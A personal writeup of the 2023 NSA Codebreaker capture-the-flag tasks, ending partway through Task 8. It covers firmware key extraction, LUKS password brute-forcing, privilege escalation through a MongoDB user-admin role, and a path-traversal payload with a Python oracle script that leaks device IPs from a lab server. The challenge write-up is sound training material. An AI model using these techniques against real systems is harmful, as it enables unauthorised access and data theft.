Preamble
Hello to everyone reading this! This is a collection of writeups for the 2023 NSA Codebreaker Challenge. If you’re wondering why this post is in 2024, the challenge was held in 2023 and extended to January 2024.
Anyway, I had a ton of fun with these challenges (except 7), and I hope you enjoy reading these writeups as much as I enjoyed writing them! I’ll go through each challenge and insert my own personal thoughts and comments along the way, so the writeups will be a bit more informal than usual.
Also, as a note, I won’t give specific step-by-step instructions to solve each challenge, but rather an overview of the process I took. Anyway, I don’t want to waste any more of your time, so let’s get started!
Task 0
Honestly they should use their CTF-Bot for other stuff than just email verification but that’s just my personal opinion ¯\_(ツ)_/¯. Anyway there’s nothing to say for this one, just authenticate through the bot and get the “flag”.
Task 1 - Find the Unknown object
General programming, database retrieval
The US Coast Guard (USCG) recorded an unregistered signal over 30 nautical miles away from the continental US (OCONUS). NSA is contacted to see if we have a record of a similar signal in our databases. The Coast guard provides a copy of the signal data. Your job is to provide the USCG any colluding records from NSA databases that could hint at the object’s location. Per instructions from the USCG, to raise the likelihood of discovering the source of the signal, they need multiple corresponding entries from the NSA database whose geographic coordinates are within 1/100th of a degree. Additionally, record timestamps should be no greater than 10 minutes apart.
Downloads:
- file provided by the USCG that contains metadata about the unknown signal (USCG.log)
- NSA database of signals (database.db)
Prompt:
- Provide database record IDs, one per line, that fit within the parameters specified above.
The first real task. We’re asked to retrieve database record IDs that match the given logfile below:
The database they give us is an SQLite 3 database, so we can simply connect with sqlite3 and query the database on the given parameters.
331|26.00298|-83.33024|0 m|331|13:39:22|02/20/2023
555|26.00057|-83.33187|0 m|555|13:41:30|02/20/2023
This gives us our two answers, 331 and 555.
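The query itself isn’t shown above, so here is a minimal sketch of the same filter using Python’s sqlite3 module. The table names (location, event_time), the column names, the two extra sample rows, and the signal coordinates and time passed in at the end are all assumptions for illustration; the real schema in database.db and the values from USCG.log would need to be substituted.

```python
import sqlite3
from datetime import datetime, timedelta

# Hypothetical schema and rows, loosely modelled on the output shown above.
conn = sqlite3.connect(":memory:")
conn.executescript("""
CREATE TABLE location   (id INTEGER PRIMARY KEY, latitude REAL, longitude REAL);
CREATE TABLE event_time (id INTEGER PRIMARY KEY, rec_time TEXT, rec_date TEXT);
INSERT INTO location VALUES
    (331, 26.00298, -83.33024), (555, 26.00057, -83.33187),
    (777, 26.00100, -83.33100), (900, 40.00000, -70.00000);
INSERT INTO event_time VALUES
    (331, '13:39:22', '02/20/2023'), (555, '13:41:30', '02/20/2023'),
    (777, '15:00:00', '02/20/2023'), (900, '13:40:00', '02/20/2023');
""")

def find_matches(conn, lat, lon, when, max_deg=0.01, max_gap=timedelta(minutes=10)):
    """Return record IDs within max_deg degrees and max_gap of the signal."""
    rows = conn.execute(
        """
        SELECT l.id, t.rec_date, t.rec_time
        FROM location AS l JOIN event_time AS t ON t.id = l.id
        WHERE ABS(l.latitude - ?) <= ? AND ABS(l.longitude - ?) <= ?
        ORDER BY l.id
        """,
        (lat, max_deg, lon, max_deg),
    ).fetchall()
    matches = []
    for rec_id, rec_date, rec_time in rows:
        # Dates in the sample output use MM/DD/YYYY, so parse them in Python.
        seen = datetime.strptime(f"{rec_date} {rec_time}", "%m/%d/%Y %H:%M:%S")
        if abs(seen - when) <= max_gap:
            matches.append(rec_id)
    return matches

signal_time = datetime(2023, 2, 20, 13, 40, 0)  # assumed value, not from USCG.log
print(find_matches(conn, 26.0, -83.33, signal_time))
```

Doing the coordinate check in SQL and the time check in Python avoids having to reformat the date strings inside SQLite.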
Task 2 - Extract the Firmware
Hardware analysis, Datasheets
Thanks to your efforts the USCG discovered the unknown object by trilaterating the geo and timestamp entries of their record with the correlating entries you provided from the NSA databases. Upon discovery, the device appears to be a device with some kind of collection array used for transmitting and receiving. Further visual inspection shows the brains of this device to be reminiscent of a popular hobbyist computer. Common data and visual ports non-responsive; the only exception is a boot prompt output when connecting over HDMI. Most interestingly there is a 40pin GPIO header with an additional 20pin header. Many of these physical pins show low-voltage activity which indicate data may be enabled. There may be a way to still interact with the device firmware…
Find the correct processor datasheet, and then use it and the resources provided to enter which physical pins enable data to and from this device
Hints:
- Note: For the pinout.svg, turn off your application’s dark mode if you’re unable to see the physical pin labels (eg: ‘P1’, ‘P60’)
- The pinout.svg has two voltage types. The gold/tan is 3.3v, the red is 5v.
- The only additional resource you will need is the datasheet, or at least the relevant information from it
Downloads:
- Rendering of debug ports on embedded computer (pinout.svg)
- image of device CPU (cpu.jpg)
- copy of display output when attempting to read from HDMI (boot_prompt.log)
Prompts:
- Provide the correct physical pin number to power the GPIO header:
- Provide a correct physical pin number to ground the board:
- Provide the correct physical pin number for a UART transmit function:
- Provide the correct physical pin number for a UART receive function:
This time, we’re given two images and a boot log, and we need to identify a few key pins on the device.
I’m honestly not too familiar with hardware at all, so I had to do quite a bit of research for this one. But first, starting with the power pin, since we are powering the GPIO header, we need 3.3v, which is the gold/tan color on the pinout.svg.
Physically, this is pin 51, since the physical pins on the 20-pin extension follow a zigzag pattern. (Notice how pin 41 and pin 42 are on opposite sides; this pattern continues through the header, ending with pins 59 and 60.)
Next, any grey pin will work for the ground pin, so I just chose pin 52, which is right next to the 3.3v pin.
For the UART transmit and receive pins, we need to take a look at the log. The log tells us that the alternative function assignment is ALT3, which is important since the function assignment changes what each pin does.
Through some more research, I found this datasheet for the BCM2835, which, while not exactly the same chip, is close enough for our purposes.
On this datasheet, ALT3 has transmit and receive on GPIO32 and GPIO33 respectively. Looking back at the pinout, we see that these are pins 53 and 54, so we have our answers (51, 52, 53, 54)!
Task 3 - Analyze the Firmware
Emulation
Leveraging that datasheet enabled you to provide the correct pins and values to properly communicate with the device over UART. Because of this we were able to communicate with the device console and initiate a filesystem dump.
To begin analysis, we loaded the firmware in an analysis tool. The kernel looks to be encrypted, but we found a second-stage bootloader that loads it. The decryption must be happening in this bootloader. There also appears to be a second UART, but we don’t see any data coming from it.
Can you find the secret key it uses to decrypt the kernel?
Tips:
- You can emulate the loader using the provided QEMU docker container. One download provides the source to build your own. The other is a pre-built docker image. See the README.md from the source download for steps on running it.
- Device tree files can be compiled and decompiled with dtc.
Downloads:
- U-Boot program loader binary (u-boot.bin)
- Recovered Device tree blob file (device_tree.dtb)
- Docker source files to build the QEMU/aarch64 image (cbc_qemu_aarch64-source.tar.bz2)
- Docker image for QEMU running aarch64 binaries (cbc_qemu_aarch64-image.tar.bz2)
Prompt:
- Enter the decryption key u-boot will use.
After building the provided docker image, I followed the steps in the README with the netcat listeners and dboot, and eventually I got to the initial boot screen.
Anyway, from here there was a lot of stuff I could try, but my first idea was loading the u-boot loader into a decompiler and seeing what I could find.
Lots of mucking around later and staring at uninteresting code, eventually I found this snippet that seemed interesting:
A key and an iv, you say? Well, going back to the booted device, we can use the printenv command to see the environment variables (found via help), and sure enough, there they are!
Additionally, these two environment variables don’t look like any of the other address variables (see the “0x” on kernel_addr_r?), so they definitely stood out more as well.
But all we have is the address, how do you get the actual key?
Well, with more combing through help, I found out about the md command.
Using this, we can dump the memory at the given address, and sure enough, we get the key!
Submitting the hex f41bf6ff71239dc43f83045e453e6b84 works and lets us move on.
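If the dump is taken with the byte-wide variant of the command (md.b), turning it into a hex string is just a matter of joining the byte columns. Here is a small sketch of that; the address in the sample line is a placeholder, and the assumption is that the output has the usual "address: bytes  ASCII" layout. Plain md prints 32-bit words by default, so the bytes may need reordering if that form is used instead.

```python
import re

HEX_BYTE = re.compile(r"[0-9a-fA-F]{2}")

def bytes_from_md_b(dump: str, per_line: int = 16) -> str:
    """Join the hex byte columns of `md.b` output into one hex string."""
    out = []
    for line in dump.strip().splitlines():
        _addr, _, rest = line.partition(":")
        # Only the first `per_line` tokens are data; the ASCII column follows.
        for token in rest.split()[:per_line]:
            if not HEX_BYTE.fullmatch(token):
                break
            out.append(token.lower())
    return "".join(out)

# Address is a placeholder; the byte values are the key from this writeup.
sample = "00000000: f4 1b f6 ff 71 23 9d c4 3f 83 04 5e 45 3e 6b 84  ....q#..?..^E>k."
print(bytes_from_md_b(sample))
```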
Task 4 - Emulate the Firmware
Dynamic Reverse Engineering, Cryptography
We were able to extract the device firmware, however there isn’t much visible on it. All the important software might be protected by another method.
There is another disk on a USB device with an interesting file that looks to be an encrypted filesystem. Can you figure out how the system decrypts and mounts it? Recover the password used to decrypt it. You can emulate the device using the QEMU docker container from task 3.
Downloads:
- main SD card image (sd.img.bz2)
- USB drive image (usb.img.bz2)
- Linux kernel (kernel8.img.bz2)
- Device tree blob file for emulation (bcm2710-rpi-3-b-plus.dtb.bz2)
Prompt:
- Enter the password used to decrypt the filesystem.
This time, we can actually work with the decrypted full image. Booting up the image following the README again, I noticed this interesting part near the end of the booting sequence
Seems to be some sort of decryption, so probably something we should look out for.
Additionally, on the actual device itself, we have a few interesting folders: /agent, which is empty for now, and /private:
We also have some interesting files in /opt:
mount_part is especially interesting, since it seems to be a bash script that mounts an encrypted partition.
We have some data that gets fed into a sha1 hash, which then gets fed into cryptsetup open as the password. Since we need to find the password for the encrypted partition, this is probably what we’re looking for.
Additionally, in /etc/init.d, we have this script that runs on boot:
This confirms that mount_part is the script we should be looking at for the password.
Luckily, we can get the NAME variable easily, by just running hostname.
However, we don’t have access to the /private/id.txt file, as it seems to be wiped on boot.
I got really lucky on this next step and just guessed that the 3 characters taken from ID would all be digits (seriously idk how I did that 😭) and brute forced them using a simple script to generate all 3 digit passwords.
Then I just ran them through bruteforce-luks, and sure enough, eventually I got the password!
This corresponded with lowlythyme862, so that was the final password.
As it turns out, the intended solution was indeed to brute force, but with hex digits instead of base 10 digits, as id.txt contained a UUID. I just got really lucky that the 3 characters used in my case all happened to be digits.
Additionally, it was possible to use hashcat to extract the hash and crack it that way, which would’ve been much faster.
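For reference, generating the candidate list is only a few lines. This is a sketch under the assumptions described above: the candidate is the hostname followed by 3 characters from the ID, and those characters are hex digits. The sha1_hex helper is included because mount_part hashes its input before handing it to cryptsetup; whether the cracking tool should be fed the plain candidates or their digests depends on the script, which isn’t reproduced here.

```python
import hashlib
from itertools import product

HEX_DIGITS = "0123456789abcdef"

def candidates(name: str, alphabet: str = HEX_DIGITS, length: int = 3):
    """Yield name + every `length`-character suffix over `alphabet`."""
    for combo in product(alphabet, repeat=length):
        yield name + "".join(combo)

def sha1_hex(text: str) -> str:
    """Hex SHA-1 digest of a candidate, in case the hashed form is needed."""
    return hashlib.sha1(text.encode()).hexdigest()

wordlist = list(candidates("lowlythyme"))
print(len(wordlist), wordlist[0], wordlist[-1])
```

With hex digits there are only 16^3 = 4096 candidates (1000 if restricted to decimal digits), so even a slow LUKS brute force finishes in reasonable time.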
Task 5 - Follow the Data Part 1
Reverse Engineering, Forensics
Based on the recovered hardware the device seems to have an LTE modem and SIM card implying it connects to a GSM telecommunications network. It probably exfiltrates data using this network. Now that you can analyze the entire firmware image, determine where the device is sending data.
Analyze the firmware files and determine the IP address of the system where the device is sending data.
Prompt:
- Enter the IP address (don’t guess)
So now that we have the password, we have to actually mount the encrypted partition.
Running the mount_part script with id.txt filled out properly, we can get the decrypted partition mounted on /agent:
The three important files here are agent, diagclient, and dropper, all of which are binaries that are part of the C2 process.
Now, the intention of the challenge is to reverse the individual binaries and figure out what’s going on, but when I was solving, I didn’t feel like looking at them in depth at the time (which is a decision that will hurt later, but for now it’s fine).
But since the category of the task was labeled forensics, I thought it would be interesting to extract from the binaries and see if there were any embedded files that could be helpful.
However, when I extracted from the dropper binary, it generated a very interesting file:
And lo and behold, this has all the information we need.
Submitting the IP 100.108.114.44 works, meaning the binaries are exfiltrating data to this mongodb server.
Task 6 - Follow the Data Part 2
Forensics, Databases, Exploitation
While you were working, we found the small U.S. cellular provider which issued the SIM card recovered from the device: Blue Horizon Mobile.
As advised by NSA legal counsel we reached out to notify them of a possible compromise and shared the IP address you discovered. Our analysts explained that sophisticated cyber threat actors may use co-opted servers to exfiltrate data and Blue Horizon Mobile confirmed that the IP address is for an old unused database server in their internal network. It was unmaintained and (unfortunately) reachable by any device in their network.
We believe the threat actor is using the server as a “dead drop”, and it is the only lead we have to find them. Blue Horizon has agreed to give you limited access to this server on their internal network via an SSH “jumpbox”. They will also be sure not to make any other changes that might tip off the actor. They have given you the authority to access the system, but unfortunately they could not find credentials. So you only have access to the database directly on TCP port 27017
Use information from the device firmware, and (below) SSH jumpbox location and credentials to login to the database via an SSH tunnel and discover the IP address of the system picking up a dead drop. Be patient as the actor probably only checks the dead drop periodically. Note the jumpbox IP is 100.127.0.2 so don’t report yourself by mistake
Downloads:
- SSH host key to authenticate the jumpbox (optional) (jumpbox-ssh_host_ecdsa_key.pub)
- SSH private key to authenticate to the jumpbox: user@external-support.bluehorizonmobile.com on TCP port 22 (jumpbox.key)
Prompt:
- Enter the IP address (don’t guess)
Now we have access to the attacker’s mongodb server.
After messing around a bit to actually install mongosh and setting up the jumpbox properly, I was able to connect to the database:
This part is a bit scuffed, but basically we know that there’s another IP that’s accessing this database and retrieving the files.
So if we have some way to track what IPs access the database, we can catch the attacker.
Thankfully, we do have a way to track this! The database profiler gives us a way to track all the queries that are run on the database.
However, if we try to set the profiler level to 2, we get an error:
This means our user isn’t authorized to run this command, so we need to find a way to escalate our privileges.
If we list the users in the database, we can see our current maintenance user:
Interesting, we have the userAdmin role, which means we can create new users with any role we want.
So all we have to do is make a new user that can actually run setProfilingLevel and we’re good to go.
Now we can log in as our new user, set the profiling level to 2, and profit!
After waiting a bit, the other IP will query the database and show up in the profiler:
The client key is the IP we’re looking for, so we can submit 100.94.3.187 and move on!
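As a rough sketch of the escalation, here are the two MongoDB command documents involved, written as Python dicts. The username, password, and database name are placeholders, and dbAdmin is an assumption: it is a built-in role that includes the enableProfiler action, but the role used in the original solve isn’t shown.

```python
import json

def create_user_cmd(username: str, password: str, db: str) -> dict:
    """createUser command granting a role that is allowed to enable profiling."""
    return {
        "createUser": username,
        "pwd": password,
        # dbAdmin is assumed here; any role with enableProfiler would do.
        "roles": [{"role": "dbAdmin", "db": db}],
    }

def profile_cmd(level: int = 2) -> dict:
    """profile command; level 2 records every operation in system.profile."""
    return {"profile": level}

# Placeholder names, for illustration only.
print(json.dumps(create_user_cmd("profiler_user", "change-me", "example_db")))
print(json.dumps(profile_cmd()))
```

These documents can be passed to db.runCommand in mongosh. Once profiling is on, the entries that land in the system.profile collection carry the client field mentioned above.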
Task 7 - There is Another
Reverse Engineering, Exploitation
Intelligence sources indicate with high probability there is a second device somewhere. We don’t know where it is physically, but maybe you can find its IP address somehow. We expect it is one of the up to 2^20 devices connected to the Blue Horizon Mobile network. Blue Horizon Mobile has explained that their internal network is segmented so all user devices are in the 100.64.0.0/12 IP range.
Figure out how the device communicates with the IP you found in the previous task. It must only do so on-demand otherwise we would have probably discovered it sooner. This will probably require some in depth reverse engineering and some guess work. Use what you learn, plus intuition and vulnerability research and exploitation skills to extract information from the server somehow. Your goal is to determine the IP addresses for any devices that connected to the same server. There should be two addresses, one for the downed device, and another for the second device. Your jumpbox account has been updated to allow you to open TCP tunnels to the server (reconnect to enable the new settings). Remember the jumpbox internal IP is 100.127.0.2
Downloads:
- SSH host key to authenticate the jumpbox (optional, same as before) (jumpbox-ssh_host_ecdsa_key.pub)
- SSH private key to authenticate to the jumpbox: user@external-support.bluehorizonmobile.com on TCP port 22 (same as before) (jumpbox.key)
Prompt:
- Enter device IP addresses, one per line (don’t guess)
Now we’re getting to the real tough stuff. This time, we somehow need to find the IP of another device. But where to begin?
C2 Review
Let’s start with an overview of the entire attack process again.
Recall from Task 4 that we have this script that runs on boot:
After mounting the encrypted partition, it runs /agent/start to start the actual binaries.
Of course, in this case /bin/nav isn’t a real service and is just a placeholder, but the important part is that it runs /agent/agent with the config file /agent/config.
Now this binary is the actual C2 agent, so let’s start reversing!
Reversing the C2 Agent
I’ll be using Binja for most of these reverse engineering portions, but the general idea should be the same for any other decompiler (From what I’ve heard it’s even easier on IDA).
First, before we start reversing, let’s look at the config file:
Looks like we have a lot going on here. First, we have some sort of logging mechanism, as well as an option to daemonize the process.
Then, we seem to have some private keys as well as the id file we saw earlier.
Next, we seem to have the host and port for the actual C2 communication.
After that are some options for collection and the dropper. From Task 5/6, we can assume this is just for sending files back to the C2 server through mongodb.
We have the nav service ipc as well, but that probably isn’t useful for us.
Finally we have a key file as well as a restart flag.
Now, because this config has to be parsed by the binary, we can try looking for related strings in the binary itself. Here is the process using “navigate_ipc” as an example:
This leads us straight into our main function:
Yeah, that’s really long…
But there are a few key parts if we break it down. First comes the parsing of the config file, done by calls that are mostly of the form function(arg1, "config_option", arg2), so they stand out quite a bit.
Next is this section, which seems to be spawning 3 threads:
Each thread has a log message at the start like so:
So we can rename the above to their respective names:
The upload_thread is the thing that actually sends files back to the C2 server by calling dropper, so we can ignore that.
Honestly, I’m not too sure what collect_thread does, but it seems to be related to the collectors_usb and collectors_ipc options in the config file.
But importantly, the cmd_thread is the one that actually handles the C2 communication, so we should take a look at that.
I won’t go super in depth right now, but essentially one of the commands that the cmd_thread can run is this:
Which sets some environment variables and then runs /agent/diagclient. This is the other point of contact we’re looking for, an SSH connection to the IP we found in Task 6.
Double Checking
First, before we even look at diagclient, let’s see if this theory is actually correct.
From the config file, we can infer that the private key used for the ssh connection is /private/id_ed25519, and our user should be nonroot_user.
We can set up the jumpbox to point to port 22 for ssh like so:
And then connect with
If we connect and send an empty line, here’s what we get:
So it seems that diagclient should be sending an HTTP request over this SSH connection.
Alright, now to actually reverse diagclient.
Reversing diagclient
Thankfully, diagclient isn’t stripped like agent was, but… it’s Golang.
Reversing Golang is honestly a pain just because of how big everything gets, so it’s a good thing we can reach main.main easily.
Here’s a basic rundown of main.main, since I don’t want to go in depth with Go reversing:
First, it extracts the environment variables that were set earlier from agent.
Then, it does some double-checking with the private key and expected host key to make sure they match.
Next, it establishes the actual ssh connection.
Finally, it gathers some information about the device with diagclient/procinfo.ProcInfo, encodes it as json, creates an HTTP request with that json, and sends it over the ssh connection.
After sending it over, it reads the returned HTTP response and parses its body as json as well. This parsing even includes a bit where the diagclient process can run other system commands, but that is unused for this challenge.
Alright, well now we know that it’s an HTTP request, why not just do it ourselves?
Find the params
Here’s a quick little script I wrote to send arbitrary json to the server:
When we run this, we get this response back:
So it works! But, now what? We need to figure out how to send useful json to the server.
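A request like this can be framed by hand in a few lines. The sketch below only builds the bytes; the POST method, the "/" path, and the Host value are assumptions, since the exact request line diagclient uses isn’t shown here, and the result would still need to be written to the SSH channel described above.

```python
import json

def build_request(payload: dict, path: str = "/", host: str = "localhost") -> bytes:
    """Frame a JSON payload as a raw HTTP/1.1 request (method and path assumed)."""
    body = json.dumps(payload).encode()
    head = (
        f"POST {path} HTTP/1.1\r\n"
        f"Host: {host}\r\n"
        "Content-Type: application/json\r\n"
        f"Content-Length: {len(body)}\r\n"
        "Connection: close\r\n"
        "\r\n"
    )
    return head.encode() + body

print(build_request({"hello": "world"}).decode())
```

Computing Content-Length from the encoded body rather than the string keeps the header correct if the payload ever contains non-ASCII characters.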
Back to more Go reversing :/
Since we know this is a Go binary, let’s try seeing if we can find any information about the types. I ended up using GoReSym from Mandiant, which produced a giant json file with a bunch of information about the binary.
Some searching shows that there exist main_StatusUpdate and main_CommandResponse structs, which should be the types for the json we’re sending:
Cleaned up, they should look like this:
Going back to Binja, we can see that the keys for json should be "status_data" and "command_response" respectively:
Let’s try submitting some valid, but empty json:
This time, we get a different response.
{diagserver} 2024/01/13 02:51:06.101452 received StatusUpdate with CommandResponse
{diagserver} 2024/01/13 02:51:06.101459 Invalid length for command_response.starttime: len() = 0 != 25
{diagserver} 2024/01/13 02:51:06.101471 Content-Length: 0
{diagserver} 2024/01/13 02:51:06.101475 server to client body:
After a bit of trial and error, we find that if command_response is included in the json, it must have both a starttime and endtime field, and they must be 25 characters long.
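Conveniently, an ISO 8601 timestamp with a UTC offset and no fractional seconds is exactly 25 characters. The sketch below builds a command_response with well-formed values on that basis. That the fields are meant to hold timestamps in this format is an assumption (the logs only show a length check), and the rest of the JSON layout is left out.

```python
from datetime import datetime, timezone

def stamp(moment: datetime) -> str:
    """Format an aware datetime as a 25-character UTC ISO 8601 string."""
    return moment.astimezone(timezone.utc).replace(microsecond=0).isoformat()

def command_response(start: datetime, end: datetime) -> dict:
    """Build the command_response object with both required fields."""
    fields = {"starttime": stamp(start), "endtime": stamp(end)}
    # The server rejects anything that is not exactly 25 characters long.
    assert all(len(value) == 25 for value in fields.values())
    return {"command_response": fields}

example = command_response(
    datetime(2024, 1, 13, 2, 51, 6, tzinfo=timezone.utc),
    datetime(2024, 1, 13, 2, 51, 7, tzinfo=timezone.utc),
)
print(example)
```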
But now what?
I love fuzzing wow fuzz omg wow amazing
At this point I got really stuck; I wasn’t sure how to even begin attacking the remote server.
I ended up going down a bunch of rabbit holes, like improper json parsing, HTTP injection, and even possible command injection through the cmd field.
But nothing seemed to work.
Eventually, I just started manually fuzzing the json to see if anything interesting would happen (I was really desperate at this point).
As luck would have it, at some very late hour, one particular payload did indeed result in something interesting.
{diagserver} 2024/01/13 02:56:55.722170 received StatusUpdate with CommandResponse
{diagserver} 2024/01/13 02:56:55.722228 Error storing CommandResponse to /diagnostics/var/logs/commands/by-ip/64/7F/00/02/AAAAAAAAAAAAAAAAAAAAAAAA\x00.json: open /diagnostics/var/logs/commands/by-ip/64/7F/00/02/AAAAAAAAAAAAAAAAAAAAAAAA\x00.json: invalid argument
{diagserver} 2024/01/13 02:56:55.722244 Content-Length: 0
{diagserver} 2024/01/13 02:56:55.722248 server to client body:
An error on a file path? Interesting…
It seems the starttime field gets directly appended to the file path, so we can use this to probe whether arbitrary paths exist on the server.
But wait… what’s that I see just before our input… by-ip/64/7F/00/02/?
And what was our jumpbox IP again? 100.127.0.2, which is 64.7F.00.02 when each octet is written in hex. An exact match!
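The mapping between an IP and its by-ip directory is just each octet written as two uppercase hex digits. A quick sketch of both directions (the function names are made up for illustration):

```python
def ip_to_path(ip: str) -> str:
    """Convert dotted-decimal IPv4 to the by-ip directory layout."""
    return "/".join(f"{int(octet):02X}" for octet in ip.split("."))

def path_to_ip(path: str) -> str:
    """Convert a by-ip directory path back to dotted-decimal IPv4."""
    return ".".join(str(int(part, 16)) for part in path.strip("/").split("/"))

print(ip_to_path("100.127.0.2"))
print(path_to_ip("64/7F/00/02"))
```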
So now our plan is to use the file traversal to go back up through each folder and leak the IP, byte by byte.
We can get different errors by using a valid path but bad file like so, which tells us if we’re on the right track or not:
{diagserver} 2024/01/13 03:15:53.278825 Error storing CommandResponse to /diagnostics/var/logs/commands/by-ip/64/7F/00/02/../../../../00/./././././.json: open /diagnostics/var/logs/commands/by-ip/64/7F/00/02/../../../../00/./././././.json: no such file or directory
{diagserver} 2024/01/13 03:17:25.273965 Error storing CommandResponse to /diagnostics/var/logs/commands/by-ip/64/7F/00/02/../../../../64/./././././.json: open /diagnostics/var/logs/commands/by-ip/64/7F/00/02/../../../../64/./././././.json: permission denied
Additionally, if we don’t get an error at all, we must have reached a completely valid folder, so we can stop there.
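The search described above can be sketched as a depth-first walk over the four directory levels. This is a simplified illustration, not the original solver: the exists callable stands in for sending a request and reading the server’s reply (treating "no such file or directory" as a miss and anything else as a hit), and fake_oracle simulates the server locally so the logic can be run on its own. The padding trick with "./" and a doubled "/" is how the sketch keeps every payload at exactly 25 characters.

```python
from typing import Callable, Iterator, Tuple

WIDTH = 25      # starttime must be exactly 25 characters
UP = "../" * 4  # climb from by-ip/64/7F/00/02/ back to by-ip/

def make_payload(parts: Tuple[str, ...]) -> str:
    """Build a 25-character starttime that resolves to by-ip/<parts>/."""
    base = UP + "".join(p + "/" for p in parts)
    pad = WIDTH - len(base)
    if pad < 0:
        raise ValueError("path too long for the 25-character field")
    # "./" and a doubled "/" are no-ops in a path, so they serve as padding.
    return base + "./" * (pad // 2) + "/" * (pad % 2)

def walk(exists: Callable[[str], bool], prefix: Tuple[str, ...] = ()) -> Iterator[str]:
    """Depth-first search over the four hex-named directory levels."""
    if len(prefix) == 4:
        yield ".".join(str(int(p, 16)) for p in prefix)
        return
    for value in range(256):
        parts = prefix + (f"{value:02X}",)
        if exists(make_payload(parts)):
            yield from walk(exists, parts)

def fake_oracle(known_ips):
    """Local stand-in for the server: True if the probed directory exists."""
    dirs = set()
    for ip in known_ips:
        parts = tuple(f"{int(o):02X}" for o in ip.split("."))
        dirs.update(parts[:i] for i in range(1, 5))

    def exists(payload: str) -> bool:
        assert len(payload) == WIDTH
        parts = tuple(p for p in payload.split("/") if p not in ("", ".", ".."))
        return parts in dirs

    return exists

JUMPBOX = "100.127.0.2"
oracle = fake_oracle(["100.67.135.8", "100.76.16.177", JUMPBOX])
found = [ip for ip in walk(oracle) if ip != JUMPBOX]
print(found)
```

Because each level is only probed under prefixes that already exist, the walk needs at most a few thousand requests rather than anything close to 2^20. The jumpbox’s own directory shows up too, so it is filtered out at the end.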
In the end, this was the solver I ended up using:
After running and waiting a bit, we get our two IPs!
100.67.135.8
100.76.16.177
Honestly, this challenge isn’t horribly difficult, but my main issue with it is that I really don’t like the jump from finding the JSON types to just guessing that starttime had path injection. There was no lead-up at all and it just seemed super guessy that it would work.
Task 8 - Decrypt the Comms
Reverse Engineering, Cryptography
The security team at Blue Horizon Mobile was able to capture a packet destined to the device under investigation. It looks to be encrypted, and a quick analysis of the firmware show it uses an HMAC scheme for authentication.
Can you decrypt the packet and recover the secret HMAC key the software uses to verify the contents?
Downloads:
- Packet capture (capture.pcap)
Prompt:
- Enter the HMAC key string used to authenticate the given packet.
This time, we’re given a PCAP that’s supposedly encrypted. We’re also told it uses an HMAC scheme for authentication and we need to recover the secret HMAC key. This means we probably also have to decrypt the packet in the process.
Inside the PCAP, there’s only a single UDP packet:
The packet is a UDP payload to port 9000 that’s 288 bytes long. We know this must be talking with the device, so there must be logic in one of the binaries that handles this.
If we recall back to the config file that was passed into the agent binary, we have this:
Looking back at the main function of agent, there are a few things we can do.
First, there’s one function (sub_402640) that gets called over and over with readable string arguments, so let’s call that log_message.
Then, after the option parsing in main, there’s also this snippet:
Going through each sub_ function, we immediately see calls to log_message:
Pretty clearly, these are the functions that act as different threads for the C2 process, so let’s rename them.
For the upload thread, it sets the environment variables DB_DATABASE, DB_COLLECTION, and DB_URL, then calls the dropper binary, which we know is the thing that sends files back to the C2 server.
The collect thread is a bit more complicated; it seems to be opening the devices from the collectors_usb and collectors_ipc options in the config file and reading some information from them.
The final cmd thread is what we’re looking for this time. In this function, before the main loop that runs the thread, it calls sub_401db0, a function that seemingly starts a listener on a UDP port, just what we’re looking for: